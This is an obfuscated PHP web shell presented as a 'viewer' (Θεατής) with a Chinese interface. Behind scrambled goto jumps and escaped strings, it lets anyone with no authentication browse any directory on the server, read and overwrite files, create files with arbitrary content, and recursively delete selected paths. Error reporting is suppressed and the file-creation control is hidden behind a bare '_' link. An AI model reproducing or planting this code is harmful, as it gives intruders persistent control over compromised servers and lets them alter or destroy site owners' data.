<?php
 goto ZNxS5; yiW47: goto Loabe; goto ZiT5z; V6fbR: KMJKB: goto q0WYT; x5OXu: goto VL8F9; goto Qdehr; d42Im: goto gGjoC; goto FDCa2; QSOK6: goto nEVIS; goto AicmH; E4ak_: goto Yynd7; goto yiW47; oIi4f: wxz3P: goto osSep; zBbUX: yPpY3: goto ocPOO; AicmH: MgMVb: goto v8ZPv; dikAG: error_reporting(0); goto Mo9gs; lSdFJ: Nv3Ct: goto Q9NUn; QM5no: goto V8hsY; goto ez3XB; tSI3i: goto FsBj5; goto S9fjx; KUoH0: YsmQf: goto MG1Ma; ZNxS5: goto KMJKB; goto rJYxF; FDCa2: azyLk: goto E4ak_; I2ADG: goto U61gf; goto zBbUX; VZjMd: goto bzQrG; goto c6T4N; CraXi: E5Qmi: goto RPOnA; izQ5E: goto MgMVb; goto CraXi; IWLDh: goto azyLk; goto tWxB_; qDjzi: oNs7J: goto XUfUG; UOQQE: gGjoC: goto P2nju; v8ZPv: aWm86: goto MCeAa; VxzzS: $edit = $_GET["\145\144\x69\164"] ?? ''; goto WeZju; kb_GA: d8MRy: goto QM5no; cFgaG: function delete_rec($path) { if (is_dir($path)) { foreach (array_diff(scandir($path), array("\x2e", "\56\x2e")) as $f) { delete_rec("{$path}\x2f{$f}"); } @rmdir($path); } else { @unlink($path); } } goto fgl8j; NC2vy: zywyK: goto ZTFrX; c6T4N: lC8LI: goto a98BW; QC74B: wwf5g: goto vObRF; rJYxF: lC_lT: goto SVjsr; aJUGc: $dir = realpath($_GET["\144\151\162"] ?? "\56") ?: getcwd(); goto mlnrg; QQCk0: iOKNq: goto HBaSz; FkKCe: goto FDqRy; goto QC74B; wO37g: goto YsmQf; goto H5omB; HBaSz: goto S3pU7; goto oIi4f; ez3XB: Uj2fm: goto WQ67E; VHXqg: U61gf: goto dikAG; OXBEq: goto vG_I_; goto Gr9N3; qVPdq: EsLSv: goto O1iPm; ORY6d: aUgiL: goto qVPdq; FSL6h: mDbxr: goto lAj2g; MCeAa: goto aUgiL; goto sS1U2; sUtDD: goto w8mHf; goto Ka_gs; tWxB_: ujPGq: goto QQCk0; GsucX: WM1ck: goto LBGfx; H5omB: JrF2y: goto BhWm6; RPOnA: goto jKZQK; goto Z6lPU; di7Nb: goto Mqkuc; goto KUoH0; TkFgL: goto I1EHq; goto Wixif; WeZju: goto O8xMy; goto uVDZF; leMz3: SLOuv: goto sUtDD; Zcwil: uAFgP: goto VF9C8; lAj2g: goto pSivf; goto V6fbR; BpE8F: goto EsLSv; goto k33J3; s4Ksx: goto mDbxr; goto QSOK6; PkcMO: w8mHf: goto w9xeC; k33J3: goto SLOuv; goto UOQQE; OcZHC: RV3kc: goto lzlNj; aZ2W1: goto Bvb20; goto qgiLI; Mo9gs: goto qnj7a; goto gFCho; umI5K: if ($_SERVER["\x52\x45\121\x55\x45\123\124\137\115\105\x54\x48\x4f\104"] === "\x50\x4f\x53\124") { if (isset($_POST["\156\145\x77\x66\151\154\x65"]) && !empty($_POST["\156\145\x77\146\151\x6c\145"])) { $filename = $_POST["\x6e\145\167\x66\x69\x6c\145"]; create_file("{$dir}\57{$filename}", $_POST["\x63\157\x6e\x74\x65\156\164"] ?? ''); } elseif (isset($_POST["\x63\157\x6e\164\x65\156\x74"]) && $edit) { create_file("{$dir}\x2f{$edit}", $_POST["\x63\x6f\x6e\x74\145\x6e\x74"]); } elseif (isset($_POST["\144\145\x6c\145\164\x65"])) { foreach ($_POST["\144\x65\x6c\x65\164\x65"] as $file) { delete_rec("{$dir}\x2f{$file}"); } } header("\114\157\x63\141\164\151\157\156\x3a\x20\77\144\x69\x72\x3d" . urlencode($dir) . ($edit ? "\x26\145\x64\151\x74\x3d" . urlencode($edit) : '')); die; } goto q9pYo; q0WYT: goto I9y_i; goto jpHez; LOgFp: ?>
<body><div class="header"><h2>Θεατής</h2><div class="path"><?php  goto AGAgx; ZiT5z: Mqkuc: goto o48DX; cSgS1: goto uxOM3; goto ORY6d; F1xKq: goto NaZpF; goto qDjzi; zuVyd: Bvb20: goto VxzzS; vObRF: if ($edit && file_exists("{$dir}\x2f{$edit}") && strpos(realpath("{$dir}\x2f{$edit}"), $dir) === 0) { $content = @file_get_contents("{$dir}\x2f{$edit}"); } goto OXBEq; WQ67E: R8bYQ: goto d42Im; gFCho: O8xMy: goto s4Ksx; o48DX: goto R8bYQ; goto v5RC8; BhWm6: goto ak13Q; goto x5OXu; YxS6T: goto d8MRy; goto z0Zbh; lzlNj: Yynd7: goto C__ZG; fabd6: goto yPpY3; goto leMz3; D76Ba: goto qpaxF; goto izQ5E; s4rtn: Loabe: goto bae_r; Ctfie: VL8F9: goto kb_GA; qgiLI: pSivf: goto umI5K; vZ2vw: goto oNs7J; goto BYfox; z1A2K: goto wwf5g; goto lSdFJ; LZZiz: goto JrF2y; goto Ctfie; xWpLf: lSLsc: goto G9V3k; eaUTe: NaZpF: goto PkcMO; F_c_2: ?>
<!doctypehtml><html><head><meta charset="utf-8"><title>Θεατής</title><style>body{font-family:sans-serif;margin:20px;background:#f5f7fa}.header{background:#2c3e50;color:#fff;padding:15px;border-radius:5px}.path{font-size:14px;color:#ccc}.list{margin:20px 0;background:#fff;border-radius:5px;box-shadow:0 2px 5px rgba(0,0,0,.1)}.item{padding:10px;border-bottom:1px solid #eee;display:flex}.item:hover{background:#f9f9f9}.item a{color:#3498db;text-decoration:none;flex-grow:1}.dir{color:#e67e22;font-weight:700}.editor{padding:15px;background:#fff;border-radius:5px;box-shadow:0 2px 5px rgba(0,0,0,.1)}textarea{width:100%;height:300px;padding:10px;border:1px solid #ddd;font-family:monospace}button{padding:8px 15px;background:#3498db;color:#fff;border:none;border-radius:4px;cursor:pointer}button:hover{background:#2980b9}.create{padding:15px;background:#fff;border-radius:5px;box-shadow:0 2px 5px rgba(0,0,0,.1);margin-bottom:20px}.create input,.create textarea{width:100%;padding:8px;margin-bottom:10px;border:1px solid #ddd}.create-toggle{cursor:pointer;color:#3498db;margin-bottom:10px;display:inline-block}.create-content{display:none}.create-content.visible{display:block}</style></head><?php  goto VZjMd; Q9NUn: qpaxF: goto aZ2W1; XvQpH: $content = ''; goto z1A2K; Kvnyi: nEVIS: goto FSL6h; dA67_: goto wxz3P; goto FLGwN; QEynr: I1EHq: goto BpE8F; O1iPm: goto uAFgP; goto s4rtn; Qdehr: JsjXi: goto GwzP4; fKEhi: bzQrG: goto LOgFp; bae_r: X6hhP: goto TkFgL; uVDZF: qnj7a: goto YxS6T; vjiha: S3pU7: goto aJUGc; C__ZG: goto zywyK; goto krshP; BYfox: sYcd_: goto ilVin; ilVin: goto iOKNq; goto oM_A4; BAIjo: goto aWm86; goto fabd6; Gr9N3: ZxUVu: goto cFgaG; epBDO: goto BnKJo; goto cSgS1; fgl8j: goto sYcd_; goto VHXqg; oM_A4: goto ujPGq; goto Kvnyi; ONdIQ: V8hsY: goto epBDO; yVY1l: HfPwO: goto fh32K; w9xeC: goto N1cvH; goto wu1I_; osSep: goto ATfVM; goto di7Nb; VF9C8: goto fTGYJ; goto F1xKq; Z6lPU: goto RV3kc; goto eaUTe; kWDJy: ATfVM: goto LZZiz; krshP: FsBj5: goto pfSTm; ZTFrX: function create_file($path, $content) { if (@file_put_contents($path, $content) !== false) { return true; } $temp = $path . "\x2e\x74\155\x70\137" . uniqid(); if (@file_put_contents($temp, $content) !== false) { @chmod($temp, 420); if (@rename($temp, $path)) { return true; } @unlink($temp); } return false; } goto tSI3i; jpHez: goto lC_lT; goto NC2vy; MG1Ma: $parent = dirname($dir); goto FkKCe; pfSTm: goto X6hhP; goto vZ2vw; LBGfx: if ($edit) { ?>
<div class="editor"><h3>编辑:<?php  echo htmlspecialchars($edit); ?>
</h3><form method="post"><textarea name="content"><?php  echo htmlspecialchars($content); ?>
</textarea> <button>保存</button> <button type="button"onclick='location.href="?dir=<?php  echo urlencode($dir); ?>
"'>取消</button></form></div><?php  } else { ?>
<div class="create"><div class="create-toggle"onclick="toggleCreate()">_</div><div class="create-content"id="createContent"><form method="post"><input name="newfile"placeholder="文件名 (如: test.txt)"required> <textarea name="content"placeholder="文件内容 (可选)"style="height:100px"></textarea> <button>创建</button></form></div></div><form method="post"><div class="list"><?php  if ($parent !== $dir) { ?>
<div class="item"><input type="checkbox"disabled> <a href="?dir=<?php  echo urlencode($parent); ?>
"class="dir">[上级目录]</a></div><?php  } if (is_dir($dir)) { $files = array_diff(scandir($dir), array("\56", "\x2e\x2e")); foreach ($files as $file) { $fullpath = "{$dir}\57{$file}"; $isDir = is_dir($fullpath); ?>
<div class="item"><input name="delete[]"type="checkbox"value="<?php  echo htmlspecialchars($file); ?>
"><?php  if ($isDir) { ?>
<a href="?dir=<?php  echo urlencode($fullpath); ?>
"class="dir"><?php  echo htmlspecialchars($file); ?>
</a><?php  } else { ?>
<a href="<?php  echo htmlspecialchars($fullpath); ?>
"target="_blank"><?php  echo htmlspecialchars($file); ?>
</a><?php  } ?>
</div><?php  } } ?>
</div><button type="submit">删除选中项</button></form><?php  } goto pUi89; mlnrg: goto E5Qmi; goto QEynr; a98BW: echo htmlspecialchars($dir); goto fRTrZ; wu1I_: N1cvH: goto kWDJy; GwzP4: ak13Q: goto I2ADG; AGAgx: goto lC8LI; goto xWpLf; Wixif: JKIMY: goto XvQpH; SVjsr: jKZQK: goto wO37g; q9pYo: goto JKIMY; goto vjiha; FLGwN: vG_I_: goto F_c_2; fh32K: goto WM1ck; goto fKEhi; fRTrZ: goto HfPwO; goto GsucX; v5RC8: goto JsjXi; goto zuVyd; sS1U2: uxOM3: goto BAIjo; wB3ye: goto ZxUVu; goto OcZHC; pUi89: goto lSLsc; goto yVY1l; XUfUG: I9y_i: goto dA67_; ocPOO: fTGYJ: goto wB3ye; S9fjx: FDqRy: goto D76Ba; P2nju: BnKJo: goto IWLDh; z0Zbh: goto Uj2fm; goto ONdIQ; Ka_gs: goto Nv3Ct; goto Zcwil; G9V3k: ?>
<script>function toggleCreate(){document.getElementById("createContent").classList.toggle("visible")}</script></body></html>